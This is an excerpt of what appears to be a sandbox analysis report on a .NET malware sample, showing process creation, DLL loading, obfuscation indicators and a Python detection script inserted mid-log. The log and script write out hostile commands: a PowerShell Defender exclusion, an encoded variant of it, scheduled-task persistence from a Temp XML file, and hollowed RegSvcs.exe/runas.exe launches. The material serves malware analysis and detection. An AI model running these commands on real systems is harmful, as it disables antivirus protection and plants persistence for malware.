                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe | Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                Source: C:\Windows\SysWOW64\runas.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe | Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
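The process-creation entries above carry the whole kill chain in four command lines: a Defender exclusion added through Add-MpPreference, a scheduled task imported from an XML file in the user's Temp directory, a signed .NET host (RegSvcs.exe) started with an empty command line by a binary on the Desktop, and runas.exe started the same way from a randomly named Program Files (x86) directory before it spawns Firefox. The following is an added example, not code from this report or from Joe Sandbox, that runs those four detections over (parent image, child command line) records as a SIEM rule would. The records are copied from the entries above; the last one is constructed by me and was not observed in this analysis: it is the same cmdlet passed through -EncodedCommand, which is why the PowerShell rule decodes UTF-16LE Base64 before matching. The set of hollowing targets beyond regsvcs.exe and runas.exe is an assumption.

```python
import base64
import re

# Constructed input: (parent image, child command line) pairs from the entries above.
# The final entry is NOT from the report; it is a constructed -EncodedCommand variant
# that exercises the Base64 decoding path.
EVENTS = [
    ("unknown",
     r'"C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe"'),
    (r"C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe"'),
    (r"C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp"'),
    (r"C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    (r"C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe",
     r'"C:\Windows\SysWOW64\runas.exe"'),
    (r"C:\Windows\SysWOW64\runas.exe",
     r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
    (r"C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -enc '
     + base64.b64encode(r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming"'.encode("utf-16-le")).decode()),
]

# Signed Microsoft binaries that .NET crypters hollow. regsvcs.exe and runas.exe are the two
# seen in this report; the others are added by assumption as commonly abused siblings.
HOLLOW_TARGETS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "runas.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus the -ec alias.
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)


def split_cmdline(cmdline: str):
    """Split a Windows command line into (image path, argument string)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end], cmdline[end + 1:].strip()
    head, _, rest = cmdline.partition(" ")
    return head, rest.strip()


def decode_powershell(args: str) -> str:
    """Return the script text, decoding a -EncodedCommand (UTF-16LE, Base64) if present."""
    for m in ENC_FLAG_RE.finditer(args):
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(m.group(2)).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return args
    return args


def detect(events):
    """Apply the rules to each event in order; returns one list of hit names per event."""
    injected_hosts = set()   # images launched bare by an untrusted parent, by full path
    results = []
    for parent, cmdline in events:
        image, args = split_cmdline(cmdline)
        name = image.rsplit("\\", 1)[-1].lower()
        parent_l = parent.lower()
        hits = []

        # schtasks /Create importing its task definition from an XML file under Temp or AppData
        if name == "schtasks.exe" and re.search(r"/create\b", args, re.I):
            m = re.search(r'/xml\s+(?:"([^"]+)"|(\S+))', args, re.I)
            xml = (m.group(1) or m.group(2)) if m else ""
            if re.search(r"\\temp\\|\\appdata\\", xml, re.I):
                hits.append("schtasks_xml_from_temp")

        # Defender exclusion via Add-/Set-MpPreference, in clear text or Base64-encoded
        if name in ("powershell.exe", "pwsh.exe"):
            script = decode_powershell(args)
            if re.search(r"\b(add|set)-mppreference\b", script, re.I) and re.search(r"-exclusion", script, re.I):
                hits.append("defender_exclusion_added" + ("_encoded" if script != args else ""))

        # Hollowing target started with no arguments by a parent that lives outside C:\Windows
        if name in HOLLOW_TARGETS and args == "" and not parent_l.startswith("c:\\windows\\"):
            hits.append("bare_lolbin_from_untrusted_parent")
            injected_hosts.add(image.lower())

        # Whatever such a host spawns is the injected code acting (here runas.exe -> firefox.exe)
        if parent_l in injected_hosts:
            hits.append("child_of_injected_host")

        results.append(hits)
    return results


if __name__ == "__main__":
    for (parent, cmdline), hits in zip(EVENTS, detect(EVENTS)):
        if hits:
            print(f"{', '.join(hits):40s} {cmdline[:90]}")
```

The empty-command-line check is the cheap signal here: neither RegSvcs.exe nor runas.exe does anything useful without arguments, so a bare launch from a user-writable or randomly named directory is worth an alert on its own, before any memory inspection.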
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll
                Source: C:\Windows\SysWOW64\runas.exe | Section loaded: credui.dll, netutils.dll, sspicli.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
                Source: C:\Windows\SysWOW64\runas.exe | Section loaded: credui.dll, netutils.dll, sspicli.dll
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe | Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\runas.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: nK1Y86mbzfbkwpB.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: nK1Y86mbzfbkwpB.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2494695347.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2689518401.0000000001137000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000002.3354731785.0000000001128000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354390333.0000000001318000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hAtMBptzWt.exe, 00000010.00000000.2407457604.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp, hAtMBptzWt.exe, 00000014.00000002.3352923930.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp, hAtMBptzWt.exe, 00000016.00000002.3356664916.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb, source: runas.exe, 00000011.00000002.3352619446.0000000002807000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3358247281.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000000.2669239142.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2941051604.000000001675C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.2495139011.0000000001460000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2502199934.0000000004329000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.000000000466E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2494898305.0000000004175000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.00000000044D0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2690019481.0000000004A70000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2698618753.0000000004C22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.2495139011.0000000001460000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000011.00000003.2502199934.0000000004329000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.000000000466E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2494898305.0000000004175000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.00000000044D0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2690019481.0000000004A70000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2698618753.0000000004C22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: runas.exe, 00000011.00000002.3352619446.0000000002807000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3358247281.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000000.2669239142.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2941051604.000000001675C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: runas.pdb source: RegSvcs.exe, 00000007.00000002.2494695347.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2689518401.0000000001137000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000002.3354731785.0000000001128000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354390333.0000000001318000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Rwk0pyWBk9DvLIlyWP.cs | .Net Code: M4mVPErxjG System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Code function: 0_2_00C1BD62 push eax; retf 0_2_00C1BF59
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Code function: 0_2_06F76E20 push esp; ret 0_2_06F76E29
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00401851 push ds; iretd 7_2_00401871
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00401A79 pushfd ; retf 7_2_00401A7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00401AE1 pushfd ; retf 7_2_00401AE5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_004032A0 push eax; ret 7_2_004032A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040BB36 push 8DDE865Dh; iretd 7_2_0040BB3E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0042344F push edi; ret 7_2_0042345E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00423453 push edi; ret 7_2_0042345E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0041A505 push ebx; ret 7_2_0041A506
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040CD17 push es; iretd 7_2_0040CD1A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00405E75 pushfd ; retf 7_2_00405E77
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00401EC6 pushfd ; retf 7_2_00401EC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040CFC0 push edi; ret 7_2_0040CFC2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_004147EF push ebx; ret 7_2_004147F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0146225F pushad ; ret 7_2_014627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_014627FA pushad ; ret 7_2_014627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_014909AD push ecx; mov dword ptr [esp], ecx 7_2_014909B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0146283D push eax; iretd 7_2_01462858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0146135E push eax; iretd 7_2_01461369
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Code function: 8_2_00E1BD62 push eax; retf 8_2_00E1BF59
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Code function: 8_2_00E1BF5A push eax; retf 8_2_00E1BF59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0173C54F push 8B016C67h; ret 14_2_0173C554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0173C54D pushfd ; ret 14_2_0173C54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0173C9D7 push edi; ret 14_2_0173C9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_016F09AD push ecx; mov dword ptr [esp], ecx 14_2_016F09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_016C1FEC push eax; iretd 14_2_016C1FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01747E99 push ecx; ret 14_2_01747EAC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe | Code function: 16_2_02F06D5B push ds; ret 16_2_02F06E30
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe | Code function: 16_2_02F06AD4 push 319F0DABh; iretd 16_2_02F06ADE
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe | Code function: 16_2_02EE8A03 pushfd ; retf 16_2_02EE8A05
                Source: nK1Y86mbzfbkwpB.exe | Static PE information: section name: .text entropy: 7.983402866122095
                Source: GDhinOc.exe.0.dr | Static PE information: section name: .text entropy: 7.983402866122095
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, hjSk8EHGb5l16oTZn0.cs | High entropy of concatenated method names: 'Dispose', 'gAAmC1Qt1m', 'QC6afDNvm2', 'D2XkkaKf66', 'VODmb0tqtU', 'D3ImzObcZt', 'ProcessDialogKey', 'vh8anWWG3D', 'lKqamVLEVJ', 'CKtaaOOxTv'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, gQjALeOJnFWAyHHjpqP.cs | High entropy of concatenated method names: 'tNeD98b30g', 'QwND8FX9o5', 'mTfDP8YoRZ', 'V8YDsyC5BU', 'iAIDd5M2R5', 'u5UDLiSVl6', 'XKSDyg9lLR', 'nFlD4fQNS0', 'pVKD3GUTKi', 'huHDjxjMBC'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, CJLCUrQatl5G4FpkW3.cs | High entropy of concatenated method names: 'ATNQdaGn2m', 'W62Qyov51X', 'U4MxMxIVgi', 'm3vxv1j33s', 'dv0xF4NXms', 'Hs6xAs8OoQ', 'IFJxKOe8Np', 'NYixu3OMJm', 'SW4xRVgjtV', 'buOxeH8fGw'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Pw34uvmK9uYKxRX1gq.cs | High entropy of concatenated method names: 'ToString', 'L106wIjwUZ', 'hyw6f7HMeI', 't0N6MmH6dB', 'Mi16vu9Ia8', 'x346FM2Xjd', 'JN36ATI407', 'NPD6KF5KVc', 'ugh6uIfODo', 'rWp6RL6Mil'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, T7qrnMxr5qJ1FRTlWO.cs | High entropy of concatenated method names: 'rN4xshHwvY', 'CZCxLMEHCa', 'Nmgx41xm2H', 'FCbx3iaNJA', 'OGmxU79MXS', 'n9kx6kPrB2', 'IChxgUOUl6', 'AKpx5VaweU', 'ue2xDYXJPZ', 'suXxcoYrHv'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, UuADkOKG7G15alU12u.cs | High entropy of concatenated method names: 'LEZJ9J56Uq', 'oLVJ8oAOAg', 'hnTJPHkb5D', 'CBAJsCcMqq', 'kZpJdEwcTe', 'OacJLVniBx', 'Iv5JyT5nNG', 'hdSJ4SVBfd', 'plyJ3iHRrd', 'oslJjspTtP'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, psNWee8JpDqgu5WYA5.cs | High entropy of concatenated method names: 'pcKUeLhd3w', 'NPPUqxxtFH', 'wBhUWGgUel', 'PU0U7dJEK5', 'YXHUffkyub', 'Vc5UMRIliH', 'ThBUvKrknq', 'Dj4UFJ0oM6', 'qCKUAUonjr', 'ybWUKkibAw'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, cPMfYVSQIacOSjALae.cs | High entropy of concatenated method names: 'CXWgtIAcG0', 'ea3gbExZjV', 'KLa5nKewMQ', 'pP05mKmuQo', 'xo1gwvYRK9', 'f72gq6OCmv', 'eBsg17vTNb', 'nm7gWKr8B5', 'wdGg70RMAi', 'vxlglhGn1e'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, trVhmEXPJju03M06gS.cs | High entropy of concatenated method names: 'Ovn5pfKV3G', 'xyl5omKrUW', 'awt5xdQe0D', 'WIJ5QfPjDC', 'Als5hcMN45', 'sIj5JfsDlW', 'DFt5NeWI8Z', 'VQv5Gl0yoH', 'A8N5IVtdX6', 'AdH5rRg3bA'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Rwk0pyWBk9DvLIlyWP.cs | High entropy of concatenated method names: 'sM5E2xKTUn', 'jCZEpqHgOe', 'eQ0Eo9ZnPY', 'KJsExoSP7B', 'GfbEQGH4JY', 'zhTEhomJdK', 'UNJEJ47qi6', 'tpKENHP6KB', 'gBeEGc4cX1', 'wfrEItlGB0'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, TnyEFwUPfADDx05OZ1.cs | High entropy of concatenated method names: 'cl1oWt1jH4', 'PTho7aOhKR', 'cBAolA6Uc8', 'Ttto0gv9rO', 'aXxoBU1E5V', 'jrhoYLgQPN', 'j2HoZarkDd', 'q60otADN3h', 'wH0oCRg8oZ', 'eOcoba0XGh'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, zXdrPraPCJk74micJF.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XmOaCArbDt', 'twaab8QIsv', 'QRHazZgBFZ', 'm5FEnMox1J', 'EELEmeHo2Y', 'IwoEam26VL', 'KFbEEqhrlk', 'uSkM3WY7vuAQHc5t5ZV'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, AMyNSSAKhaQHodQK8Z.cs | High entropy of concatenated method names: 'DKgDmi8992', 'rHZDEPwtXD', 'aXjDV8Gc3V', 'LX5Dpl9HYU', 'Jv7Do0NUGL', 'JBADQ1C13S', 'Gh0DhClqIW', 'cZF5ZNQs6Z', 'LWi5t3aPIU', 'wq95CR8rF2'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, ES98i1tBVvsqWTwSur.cs | High entropy of concatenated method names: 'P54cCvNKjb8Z3OeRthJ', 'QV3YliNviBpE8dmZNIN', 'oCEh5gc9Oc', 'SbuhDY2og2', 'Xtjhco3IuX', 'bFfU6mNsLgXQ1wGQQIP', 'Mk8WkUNrBVkXOngRQ2h', 'uf4u7JNSlJJ7YkM9qY4'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, vN0XchhhPX9IHgXFR0.cs | High entropy of concatenated method names: 'Jg1mJZ0Blm', 'i26mNhFu1i', 'mKlmIYZmRh', 'XqJmrIutUr', 'rn1mUL8Zp4', 'jQRm6JCJte', 'OXuXpc2KmjOMcOp1hk', 'qoTK18QyRV8xYmgSwO', 'NNSmmquCwq', 'xr0mEZfcTe'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, l138vr9xt3q0YSh6Zl.cs | High entropy of concatenated method names: 'bbl5X1pwsf', 'QJl5fmLTnX', 'kX45MO60uu', 'Bd05vTAKFs', 'E8W5WoCUWC', 'JWc5FCAwSv', 'Next', 'Next', 'Next', 'NextBytes'
